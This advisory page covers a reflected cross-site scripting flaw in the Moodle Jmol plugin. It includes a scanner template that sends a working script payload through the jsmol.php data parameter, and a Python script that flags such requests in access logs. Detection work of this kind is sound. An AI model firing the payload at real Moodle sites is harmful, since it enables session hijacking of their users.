CVE-2025-34032: Moodle LMS Jmol Plugin <= 6.1 - Cross-Site Scripting

Date: 2025-08-01 | Affected software: Moodle LMS Jmol Plugin | PoC: public

Vulnerability description

A reflected cross-site scripting (XSS) vulnerability exists in the Moodle LMS Jmol plugin version 6.1 and prior via the data parameter in jsmol.php. The application fails to properly sanitize user input before embedding it into the HTTP response, allowing an attacker to execute arbitrary JavaScript in the victim's browser by crafting a malicious link. This can be used to hijack user sessions or manipulate page content.

PoC code [public]

id: CVE-2025-34032

info:
  name: Moodle LMS Jmol Plugin <= 6.1 - Cross-Site Scripting
  author: madrobot,ritikchaddha
  severity: medium
  description: |
    A reflected cross-site scripting (XSS) vulnerability exists in the Moodle LMS Jmol plugin version 6.1 and prior via the data parameter in jsmol.php. The application fails to properly sanitize user input before embedding it into the HTTP response, allowing an attacker to execute arbitrary JavaScript in the victim's browser by crafting a malicious link. This can be used to hijack user sessions or manipulate page content.
  reference:
    - https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34032
  classification:
    epss-score: 0.00247
    epss-percentile: 0.47961
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cve-id: CVE-2025-34032
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    max-request: 1
  tags: cve,cve2025,moodle,xss,edb,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(document.domain)%3C/script%3E&mimetype=text/html"

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'len(body) == 41'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
        condition: and

      - type: regex
        regex:
          - '^<script>alert\(document\.domain\)</script>\s*$'
# digest: 4b0a00483046022100bfd0ee87b3bda2e1a6cd9824ab85ad4df9f6aa316478adb8edd293810eef7f63022100a2215e88fc4da9be17dcb22c0d876f647cd341340c315909872111399f4d3d5e:922c64590222798bb761d5b6d8e72950
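
An added example, not part of the template or of the plugin's code: a Python triage script for web access logs that flags GET requests to the jsmol.php saveFile call described above. The log lines are constructed samples, and the list of renderable MIME types and the tag-like pattern are assumptions chosen for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter names come from the template's request path.
ENDPOINT = "/filter/jmol/js/jsmol/php/jsmol.php"
# Assumption: response types a browser will render and script.
RENDERABLE = {"text/html", "application/xhtml+xml", "image/svg+xml"}
# Assumption: "tag-like" means '<' followed by a letter, '/' or '!'.
TAG_LIKE = re.compile(r"<\s*[a-zA-Z/!]")
# Request field of a common/combined-format access log line.
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def classify(line):
    """Return 'high', 'review' or None for one access log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    # endswith() also covers Moodle installed under a sub-path.
    if not url.path.lower().endswith(ENDPOINT):
        return None
    # parse_qs percent-decodes values, so %3Cscript%3E is seen as <script>.
    q = parse_qs(url.query, keep_blank_values=True)
    if "savefile" not in (v.lower() for v in q.get("call", [])):
        return None
    renderable = any(v.split(";")[0].strip().lower() in RENDERABLE
                     for v in q.get("mimetype", []))
    markup = any(TAG_LIKE.search(v) for v in q.get("data", []))
    if renderable and markup:
        return "high"      # markup reflected as a renderable type
    if renderable or markup:
        return "review"    # one signal only; may be legitimate use
    return None

# Constructed sample lines (documentation IP ranges); the first mirrors the template's request.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Aug/2025:10:00:01 +0000] "GET /filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(document.domain)%3C/script%3E&mimetype=text/html HTTP/1.1" 200 41',
    '198.51.100.4 - - [01/Aug/2025:10:00:05 +0000] "GET /moodle/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=HETATM%201&mimetype=text/html HTTP/1.1" 200 8',
    '198.51.100.4 - - [01/Aug/2025:10:00:07 +0000] "GET /moodle/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=C%201.0%202.0&mimetype=text/plain HTTP/1.1" 200 9',
    '198.51.100.9 - - [01/Aug/2025:10:00:09 +0000] "GET /course/view.php?id=2 HTTP/1.1" 200 5120',
]

def scan(lines):
    """Return (verdict, line) pairs for every flagged line."""
    return [(v, l) for l in lines if (v := classify(l))]

if __name__ == "__main__":
    for verdict, line in scan(SAMPLE_LOG):
        print(verdict, line)
```

Access logs record only the query string, so parameters sent in a request body are not visible to this check.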
